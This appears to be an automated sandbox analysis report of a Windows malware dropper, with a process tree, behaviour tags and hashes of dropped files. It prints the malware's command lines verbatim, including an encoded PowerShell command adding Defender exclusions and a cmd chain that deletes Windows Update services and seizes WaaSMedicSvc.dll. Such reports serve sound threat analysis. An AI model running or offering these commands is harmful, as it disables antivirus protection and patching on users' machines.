Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAZQB2AHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZgBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAaQB1AHUAIwA+AA=="
Decoded command (UTF-16LE): <#eu#> Add-MpPreference <#hevz#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#fc#> -Force <#wiuu#>
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe (depth 7)
Command line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
C:\Windows\system32\sc.exe (depth 8)
Command line: sc stop UsoSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 8)
Command line: sc stop WaaSMedicSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 8)
Command line: sc stop wuauserv
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 8)
Command line: sc stop bits
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 8)
Command line: sc stop dosvc
- Launches sc.exe
-
C:\Windows\system32\reg.exe (depth 8)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 8)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 8)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 8)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 8)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
- Modifies registry key
-
C:\Windows\system32\takeown.exe (depth 8)
Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe (depth 8)
Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe (depth 8)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 8)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 8)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 8)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\schtasks.exe (depth 8)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 8)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 8)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 8)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 8)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 8)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 8)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
C:\Windows\System32\cmd.exe (depth 7)
Command line: "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
-
C:\Windows\system32\powercfg.exe (depth 8)
Command line: powercfg /x -hibernate-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exe (depth 8)
Command line: powercfg /x -hibernate-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exe (depth 8)
Command line: powercfg /x -standby-timeout-ac 0
-
C:\Windows\system32\powercfg.exe (depth 8)
Command line: powercfg /x -standby-timeout-dc 0
-
C:\Windows\System32\conhost.exe (depth 7)
Command line: C:\Windows\System32\conhost.exe
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"7⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe (depth 7)
Command line: "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Windows Defender.exe"
-
C:\Windows\System32\Conhost.exe (depth 8)
Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\system32\choice.exe (depth 8)
Command line: choice /C Y /N /D Y /T 3
-
C:\Users\Admin\AppData\Local\svchost.exe (depth 5)
Command line: "C:\Users\Admin\AppData\Local\svchost.exe"
- Enumerates VirtualBox DLL files
- Looks for VirtualBox drivers on disk
- Looks for VirtualBox executables on disk
- Executes dropped EXE
- Looks for VMWare drivers on disk
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\InstallAppUpdates\update.exe (depth 6)
Command line: "C:\Users\Admin\AppData\Roaming\InstallAppUpdates\update.exe"
- Enumerates VirtualBox DLL files
- Looks for VirtualBox drivers on disk
- Looks for VirtualBox executables on disk
- Executes dropped EXE
- Looks for VMWare drivers on disk
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\Windows.exe (depth 4)
Command line: "C:\Users\Admin\AppData\Local\Temp\Windows.exe"
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Company\NewProduct\EU1.exe (depth 3)
Command line: "C:\Program Files (x86)\Company\NewProduct\EU1.exe"
- Executes dropped EXE
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k netsvcs -s WpnService
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k netsvcs -s Browser
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (depth 1)
Command line: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k appmodel -s StateRepository
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k localservice -s netprofm
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k networkservice -s Dnscache
-
C:\Windows\system32\ApplicationFrameHost.exe (depth 1)
Command line: C:\Windows\system32\ApplicationFrameHost.exe -Embedding
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe (depth 1)
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exe (depth 1)
Command line: C:\Windows\system32\browser_broker.exe -Embedding
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k WerSvcGroup
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Program Files (x86)\Company\NewProduct\EU1.exe
Filesize 289KB
MD5 98ee616bbbdae32bd744f31d48e46c72
SHA1 fb2fe19e8890c7c4be116db78254fe3e1beb08a0
SHA256 5e0e8817946e234867eb10b92ce613a12d1597ca53e73020ec19e1c76b3566cb
SHA512 fab7fc5c37551ca64daad4611b62d456ed245946298f1b813120ca0fe45ffb76c29ec8402327e58c565fdf42f2b1d0bd18864b4ab63f85742e2b99772981af9d
-
C:\Program Files (x86)\Company\NewProduct\F0geI.exe
Filesize 178KB
MD5 8d24da259cd54db3ede2745724dbedab
SHA1 96f51cc49e1a6989dea96f382f2a958f488662a9
SHA256 42f46c886e929d455bc3adbd693150d16f94aa48b050cfa463e399521c50e883
SHA512 ec005a5ae8585088733fb692d78bbf2ff0f4f395c4b734e9d3bed66d6a73c2ee24c02da20351397768f2420c703ad47ffee785a2a2af455a000ab0e6620ec536
-
C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe
Filesize 107KB
MD5 41e7c847d8834ad0cfaea592afa75efd
SHA1 cd96962e2380d721c16c1a80d698e91b358d9381
SHA256 2f8315b053c200047ea8a92e138b0ed39ef86f3ed41d17eee1cf281f3f0ad1fa
SHA512 5eefeace1b4192edc12eefe0c4c7a99d75f8a2a7721cd320fad6eff2bd70a24d593c67ac4b40899f719f5becbf2880fb2e5453009f39a5e1e348adb1867885b0
-
C:\Program Files (x86)\Company\NewProduct\jshainx.exe
Filesize 107KB
MD5 2647a5be31a41a39bf2497125018dbce
SHA1 a1ac856b9d6556f5bb3370f0342914eb7cbb8840
SHA256 84c7458316adf09943e459b4fb1aa79bd359ec1516e0ad947f44bdc6c0931665
SHA512 68f70140af2ad71a40b6c884627047cdcbc92b4c6f851131e61dc9db3658bde99c1a09cad88c7c922aa5873ab6829cf4100dc12b75f237b2465e22770657ae26
-
C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe
Filesize 496KB
MD5 8f5056a3da7c93b60a5c0a9a9c26242c
SHA1 c67ee1d7e81f46a5c08b45dca6eb354af1ee7b8c
SHA256 8a631481dec5c4bfde1b90e812868a5edd093f44ebbb0625f91e6548c500ef67
SHA512 617a6d8c6f3d0497503f6a15bb53623638df98b6ffed7cdaf6d1af8a327f3043f8a04e491e98bbc123740cb2e7c63caf58d93c00ecfe4e60e9460942e98747f8
-
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe
Filesize 245KB
MD5 b16134159e66a72fb36d93bc703b4188
SHA1 e869e91a2b0f77e7ac817e0b30a9a23d537b3001
SHA256 b064af166491cb307cfcb9ce53c09696d9d3f6bfa65dfc60b237c275be9b655c
SHA512 3fdf205ca16de89c7ed382ed42f628e1211f3e5aff5bf7dedc47927f3dd7ff54b0dd10b4e8282b9693f45a5ee7a26234f899d14bfd8eb0fd078b42a4ed8b8b4c
-
C:\Program Files (x86)\Company\NewProduct\real.exe
Filesize 289KB
MD5 84d016c5a9e810c2ef08767805a87589
SHA1 750b15c9c1acdfcd1396ecec11ab109706a945ad
SHA256 6e8bae93bead10d8778a8f442828aac20a0bd5c87cabe3f6d76282a9d47b7845
SHA512 7c612dd0f3eab6cb602c12390f62daa0e75d83433bcd4b682d1d5b931ebc52c8f6b32acd12474bdf6eecb91541dfa11cbbd57ca6cf8297ae9c407923e4d95953
-
C:\Program Files (x86)\Company\NewProduct\safert44.exe
Filesize 244KB
MD5 dbe947674ea388b565ae135a09cc6638
SHA1 ae8e1c69bd1035a92b7e06baad5e387de3a70572
SHA256 86aeac2a4ee8e62265ee570718bbd41a4e643e0bad69e7b4fa6c24baeb220709
SHA512 67441aebbf7ce4d53fbb665124f309faed7842b3e424e018454ff6d6f790219633ce6a9b370aeaf77c5092e84f4391df13e964ca6a28597810dee41c3c833893
-
C:\Program Files (x86)\Company\NewProduct\tag.exe
Filesize 107KB
MD5 2ebc22860c7d9d308c018f0ffb5116ff
SHA1 78791a83f7161e58f9b7df45f9be618e9daea4cd
SHA256 8e2c9fd68fc850fa610d1edfd46fc4a66adbef24e42a1841290b0e0c08597e89
SHA512 d4842627f6fab09f9472ed0b09b5e012524bf6b821d90a753275f68de65b7ba084a9e15daca58a183f89b166cc9d2d2f2d6a81e1110e66c5822b548279c8c05e
-
C:\Program Files\Defender\updater.exe
Filesize 4.9MB
MD5 14534cb24128c15a2d6c1dac1b11af55
SHA1 33dc4dac54e1adc5979a3fc732432e6d09a0c8c4
SHA256 4eefc4f042a6570cfbdbaca40622dad3c81b5c63ee039835ec41414569494d62
SHA512 609a0d51a970de923b6de0b128eb452dc9177a70fd78d269287506bbad877194a8c4a66b6a0717bc0486e11ddda6aa94a6152a83d19ae83889e5725a2e7920a7
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AB7.tmp.csv
Filesize 41KB
MD5 9edc87afcc1e728fa7da75e0adeca243
SHA1 9c51da77ae171fdc6bc6cecc5fdc87662172b496
SHA256 8fa68970ffd4b18e111b768962171aa3f7f79ad096fb3c32ff1d528ce2975b27
SHA512 4c0242d6254f1e88fd37cbe44ae7b82a45da5af7d07acb67c52f06d62c0bdab9c5ee02966b4c4309007f56bfeca3fce376d0a3acd79e753ed1eb967dad87b96a
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AD7.tmp.txt
Filesize 12KB
MD5 a1eb9c26aa8471c1d0f86fbb0f4ff83e
SHA1 48b4d3bfd7e9acc6cc7edf8ef134786601b7abda
SHA256 0e491e39e27b39b73e3c023bd30c6c15fff87db6bfa26845a6a9b80b91ec2065
SHA512 59f84b6b017c509353df1714213e6f003358ca2eb41e9684b8163ec9bbaa591cd090260c62a7ce7041152b5aaa024e31c32438ce7d27089c09ddaf68984862d2
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D1A.tmp.csv
Filesize 39KB
MD5 7bee6f0305372bb0f371ebe1b1c1ea6e
SHA1 c4611aadce56bd81004ab4afe15521a97f31d11d
SHA256 a787bf4dfd5fec8aece73de146797537c262f3b9c285689b99e86948aab7d98d
SHA512 e8d422cbcfee6e411e30bc9fb49e37cceae69cc8f8990074c6fd62c6868e3168fe003e118677bfc96dcf19b2222f3a20d6f3a045b05097702574a6b4079d9882
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D3A.tmp.txt
Filesize 12KB
MD5 adfb22bc2aeb9a998fe4ff9bf8350491
SHA1 39d081751ba1d9d0d1783b3a970b32d55c10ae07
SHA256 d7450683ce8b722148e6a4d978f5e109c9df57d1456b90888266724165679fcc
SHA512 4aa8aa5c67f56c23e23a17775cbd78fd9a246ba342cbd3c475617aa73afe94bb997c0800aa981bc296e9c403da18acbcffadb37c612d0a6f30aea0a5c48bb34d
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize 3KB
MD5 900713b658f108100bb7aa144134dbca
SHA1 7a05dd4d5cd03542c5187c8a3036f30b9d79daf0
SHA256 c59ad3c5b09e5adab5c6d20e70fc87edce830a1e696ea2b49b51fe99ae084da8
SHA512 85a5b109a01035e1ac4dec839f6b84bd6a141c6938e51f78915748a9a593b011367f1d8c7c72060a986f993ca3206fde30929b18be8d51d60cc1525a73613f8d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 a7885e1b92464320f2689e44d78ddbdf
SHA1 064eb9c538e52b11e70522c2fd3089df8bb5f59b
SHA256 2089f1529a617b107ba27dcaf0e3a79726ae0f0074907d772ed2e63126467ae1
SHA512 d7778b574171093e16422e5f9d7321fbfbf392cca2c76ac22b4a6b8ff8f27e9c50d9525a7a2e7bb0611a1553e1c980fadd4d9735d43cf083298854d32ea88da2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 5b20356b92d05d61f036769cdf2f7bbf
SHA1 95f9b464be449714747776934fa55bb5bf622795
SHA256 223d2ebeb965a165d8267e955b2d970202f3a524f6f64c559eb5a9e75bb973a3
SHA512 f046d4e812f238f8533dcb7c18e39defc5b6bd9bca644cb43362af9904aa8f4d22b00285d7985c8e955dacfaa24f24b654e66ef7e000b38729d49fedecb38411
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 98b0666d5f8e951f05374dbb3bdfda27
SHA1 f92fb138fc6ca583ddad18e160803e0a5ab74f8b
SHA256 6c64618ccb09c74a2d240301f38fb5d8f2f7fd8a651200f986595e09807308b1
SHA512 0c6fd899c13dcd146b08e6f87f24103e6d2d608fc6bce35ca59d1738fec238999c1d3f5a1234bb7bd95a9d0340d0934ad0232269e677bbcd78267a27f1068eae
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\03C0QDVU.cookie
Filesize 336B
MD5 f3939a68392e952fb3944ece4dc1fa38
SHA1 e75f3d18be36aaa3b1cf6f4a156ea2027a3b7017
SHA256 60b0113ad3fd24d89ef04e2ef294f3abf6ab5847797ca0ae492ac3c4faaa5ad2
SHA512 4f8f31a648ffce53ff7694380bfdd1f0696154c15702db26b9c84d7cf67d841df75ddeb9930072fb4260b935afe8e4dd2b44a953bcd78680267d7142316df214
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\6U04SFHO.cookieFilesize
253B
MD5f28a5484342b90f180832764cc4a7b67
SHA16dc2f1d235b199450e116b2949360d151c042ae5
SHA2566ade4a7376988a7797a46306a61956130b9e38711b63e02da74a9e1ab6aa3d43
SHA5124f34703c7690ad1b8938cec20589fe5de4acef80ce19af2b9f32518c6fb7d5a93a208239cd329ffd379f793a1a33a31216bb9e34851b59125b859a4849afb3c7
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\7EVD638G.cookieFilesize
419B
MD5453203084017209fa15639356e82bc8f
SHA18a1abac313b7c0ba1ee35e51a9516f0d9202bdb3
SHA256c267b6adb68a45789d0b64db5214577f841a4051c919d14adf9643ba00e1b4cc
SHA5129ecc1390c5bc38e3031034a2cefa7d9290370dabf549b1e1de50bdc79606d3b7ba6c622f91a11cd222d458677d3d01c192e45de371b92995dff45b4a6a68376d
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\9O4C8BF2.cookieFilesize
672B
MD50574fc6dd4fd791818db086a3f97e600
SHA1dc3c237e47e4021feb41a08b185b78ee91171d6b
SHA2561a5c07d4fc6546dcef2c0c6040a8624cb4cb273e2a20a8b294af779af70394fc
SHA512acd1ca04e8f41173edc60165486aa59e3bfc40fdffb9fd9e69073f38f89bbbedb34e9f00ed6a8b2ef8bf89696b064bf4fadef3e83204097686d6ed3016a2ea03
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\9WR7YBZO.cookieFilesize
504B
MD5ad4208a505fec4008899e91198a92b7c
SHA16b82f06633184cdf916a8655088a668ae8773574
SHA25600274fa1c03e72225ea339bf161c08e055be7be692fa7d592b80ec916de026e7
SHA5127cdcf3eb88ae7d33dc14ea117f02db47be468cd5f7962053e131e951f9c057dbae0e998d60229c48947eb44375e15a69e3955e434c481d26bb8495ba2433dda8
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\HODUNCML.cookieFilesize
588B
MD50ad546aaf3fc6dedbe0f5c6facc2b59b
SHA14a1d4c78231921be88cb60c69a43d51c2e0fd116
SHA256039a758f679e3a4f87331005e3af24905c52bb5bf96035dc0bfa788440926e0d
SHA5121764a07b8641a7b750b57d22137b040a7849105d70571a98b8b66c699e6421453c163de36e1c0ed7e7d795452ce6de48816e61fb238b6b82b87c20524ba9544a
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\K9CZGRUO.cookieFilesize
170B
MD510d2c61ee6bb54716794f918c21fa02c
SHA1f92050dfc7a0a0ba593c0d54b7cc3eccf7afd0c4
SHA2562d1ace04584584ed833ec9ecd1eabe852b07cba9e0fe173a640476e360e9fef4
SHA51265a6ff5126024a7aa4fadb8bc0d198b4bb22a8dad39abe219a4e8613a1356c3367640fad519f5a8bf060f573962e8d37f6f5cf005411782f492c434836966944
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
Filesize 717B
MD5 ec8ff3b1ded0246437b1472c69dd1811
